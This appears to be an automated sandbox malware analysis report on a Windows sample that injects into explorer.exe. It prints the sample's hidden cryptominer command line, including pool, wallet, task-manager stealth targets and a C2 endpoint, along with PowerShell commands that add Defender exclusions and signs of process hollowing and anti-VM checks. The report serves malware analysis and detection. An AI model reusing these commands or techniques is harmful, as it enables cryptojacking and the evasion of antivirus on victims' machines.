                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D8110 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_007D8110
                        Source: C:\Users\user\Desktop\file.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\{DE7C4D5F-E773-43F0-B029-ED407FF538E8} {CE0CD485-D472-437F-80D7-DAF95EA046F4}
                        Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\explorer.exe    Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exe    Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\explorer.exe    Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: C:\Users\user\Desktop\file.exe    Evasive API call chain: CreateMutex,DecisionNodes,Sleep (graph_0-18700)
                        Source: C:\Windows\explorer.exe    Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess
                        Source: C:\Users\user\Desktop\file.exe    Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_0-18700)
                        Source: C:\Users\user\Desktop\file.exe    Check user administrative privileges: IsUserAndAdmin, DecisionNode (graph_0-18802)
                        Source: C:\Windows\explorer.exe    System information queried: FirmwareTableInformation
                        Source: C:\Users\user\Desktop\file.exe    API/Special instruction interceptor: Address: 7FFDB442E814
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475569173.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: PROCESSHACKER.EXE
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: NQKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="GGBFQXMGKIMT.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID=$PPPI
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: --ALGO=RX/0 --URL=POOL.HASHVAULT.PRO:3333 --USER="46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="GGBFQXMGKIMT.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="OMSIHLOYWFALYROB" IPP
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: QKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="GGBFQXMGKIMT.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID=
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: EXPLORER.EXE--ALGO=RX/0--URL=POOL.HASHVAULT.PRO:3333--USER=46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB--PASS=--CPU-MAX-THREADS-HINT=90--CINIT-WINRING=GGBFQXMGKIMT.SYS--RANDOMX-NO-RDMSR--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP--CINIT-VERSION=3.4.1--TLS--CINIT-IDLE-WAIT=5--CINIT-IDLE-CPU=90--CINIT-ID=OMSIHLOYWFALYROB_T
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443507945.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475631783.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3391043868.0000000000747000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475456723.0000000000747000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE])5
                        Source: explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEWI
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: TS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PR
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: LTTS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PR78781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="B"BCS5HDMWNTE9HIKLWK/1IKTVYB36GXG1KIDTXELL6PR/SZMNGQ1L+CXP
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp    Binary or memory string: --ALGO=RX/0 --URL=POOL.HASHVAULT.PRO:3333 --USER="46YSJENG78AFEASVAS8AGTD5NFNHSFRQNALIWPNJHBKXCGRGGPYKAKZYJP3YSWYRD2A1CEHQQKUQDKHXWJ4XSVJXG8ASEJB" --PASS="" --CPU-MAX-THREADS-HINT=90 --CINIT-WINRING="GGBFQXMGKIMT.SYS" --RANDOMX-NO-RDMSR --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTPS://WOO097878781.WIN/66/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.1" --TLS --CINIT-IDLE-WAIT=5 --CINIT-IDLE-CPU=90 --CINIT-ID="OMSIHLOYWFALYROB"
                        Source: explorer.exe, 00000020.00000003.2475407656.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3390824384.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443389912.0000000000739000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2443507945.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475631783.0000000000748000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3391043868.0000000000747000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.3768529697.000000000072C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000003.2475456723.0000000000747000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007DCA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,0_2_007DCA00
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5720
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3979
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6773
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2905
                        Source: C:\Users\user\Desktop\file.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) graph_0-20396
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ggbfqxmgkimt.sys
                        Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_0-17618
                        Source: C:\Windows\explorer.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_4-17428
                        Source: C:\Users\user\Desktop\file.exe API coverage: 7.0 %
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe API coverage: 4.4 %
                        Source: C:\Windows\explorer.exe TID: 4996 Thread sleep count: 183 > 30
                        Source: C:\Windows\explorer.exe TID: 4996 Thread sleep time: -183000s >= -30000s
                        Source: C:\Windows\explorer.exe TID: 6192 Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472 Thread sleep count: 5720 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1472 Thread sleep count: 3979 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1812 Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204 Thread sleep count: 6773 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 424 Thread sleep count: 2905 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1208 Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\explorer.exe TID: 4412 Thread sleep count: 81 > 30
                        Source: C:\Windows\explorer.exe TID: 5936 Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\explorer.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Windows\explorer.exe Last function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007DCA90 WaitForSingleObject,LocalAlloc,wnsprintfW,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,wnsprintfW,RemoveDirectoryW,GetLastError,LocalFree,wnsprintfW,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,0_2_007DCA90
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007D3620 _memset,_memset,SHGetKnownFolderPath,lstrlenW,__snwprintf,__snwprintf,CoTaskMemFree,_memset,__snwprintf,FindFirstFileW,_memset,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,0_2_007D3620
                        Source: C:\Windows\explorer.exe Code function: 4_2_00BE97F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,4_2_00BE97F0
                        Source: C:\Windows\explorer.exe Code function: 33_2_01397FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,33_2_01397FB0
                        Source: C:\Windows\explorer.exe Code function: 35_2_027B7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,35_2_027B7FB0
                        Source: C:\Windows\explorer.exe Code function: 36_2_029F7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,36_2_029F7FB0
                        Source: C:\Windows\explorer.exe Code function: 33_2_013ABBF0 GetSystemInfo,33_2_013ABBF0
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: explorer.exe, 00000020.00000002.4653016535.00000000006F1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWYR
                        Source: explorer.exe, 00000004.00000002.4653485201.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2168797360.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2203432137.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2396903926.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2190178303.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3760997418.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2178464277.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2233935293.0000000000B41000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.0000000000699000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.4653016535.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2847225481.000000000121B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                        Source: explorer.exe, 00000004.00000002.4652932709.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWen-GBn
                        Source: explorer.exe, 00000024.00000003.4497641293.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4410054060.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4502622394.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4433977637.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000002.4570558488.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4458050505.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000024.00000003.4472943220.00000000011AB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
                        Source: explorer.exe, 00000004.00000003.3081706476.0000000002ED2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g"e
                        Source: explorer.exe, 00000004.00000002.4652932709.0000000000AA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
                        Source: file.exe, 00000000.00000002.2119116679.0000000000A07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.2446674582.000000000125B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3610623198.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3696904941.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000002.3723459059.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3661850005.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000023.00000003.3648865816.0000000000EAB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17627
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17619
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17616
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17642
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-20398
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-18806
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17696
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17646
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17645
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17712
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17680
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-18811
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17700
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-18817
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17683
                        Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-17651
                        Source: C:\Windows\explorer.exe API call chain: ExitProcess graph end node graph_4-17429
                        Source: C:\Windows\explorer.exe API call chain: ExitProcess graph end node
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007E7111 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007E7111
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007DCA00 GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,Process32NextW,CloseHandle,0_2_007DCA00
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007D8110 LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_007D8110
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007C5720 GetCurrentProcess,IsWow64Process,GetProcessHeap,0_2_007C5720
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007EA950 SetUnhandledExceptionFilter,0_2_007EA950
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007E7111 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007E7111
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007E7FFF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_007E7FFF
                        Source: C:\Windows\explorer.exe Code function: 4_2_00C0E488 SetUnhandledExceptionFilter,4_2_00C0E488
                        Source: C:\Windows\explorer.exe Code function: 4_2_00C0C4B0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00C0C4B0
                        Source: C:\Windows\explorer.exe Code function: 4_2_00C10D64 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00C10D64
                        Source: C:\Windows\explorer.exe Code function: 4_2_00C0A6E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00C0A6E8
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Code function: 8_2_00007FF60AA91160 Sleep,Sleep,_amsg_exit,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,8_2_00007FF60AA91160
                        Source: C:\Windows\explorer.exe Code function: 33_2_01455890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,33_2_01455890
                        Source: C:\Windows\explorer.exe Code function: 33_2_01452A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_01452A80
                        Source: C:\Windows\explorer.exe Code function: 35_2_02872A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,35_2_02872A80
                        Source: C:\Windows\explorer.exe Code function: 35_2_02875890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,35_2_02875890
                        Source: C:\Windows\explorer.exe Code function: 36_2_02AB2A80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_02AB2A80
                        Source: C:\Windows\explorer.exe Code function: 36_2_02AB5890 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_02AB5890

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\explorer.exe File created: WindosCPUsystem.exe.4.dr
                        Source: C:\Windows\explorer.exe Network Connect: 154.216.20.243 443
                        Source: C:\Windows\explorer.exe Network Connect: 37.203.243.102 3333
                        Source: C:\Windows\explorer.exe Network Connect: 185.157.162.216 5200
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-MpPreference -ExclusionPath 'C:\ProgramData\MicrosoftWorde\WindowsServer2024.exe','C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe','C:\ProgramData'
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007CA1B0 GetCurrentProcess,_memset,CreateProcessW,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,NtCreateSection,GetCurrentProcess,NtMapViewOfSection,_memmove,NtMapViewOfSection,_memset,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,NtUnmapViewOfSection,NtUnmapViewOfSection,NtClose,CloseHandle,CloseHandle,0_2_007CA1B0
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 6196 base: 140000000 value: 4D
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 6196 base: 140001000 value: NU
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 6196 base: 140665000 value: DF
                        Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe Memory written: PID: 6196 base: 140834000 value: 00
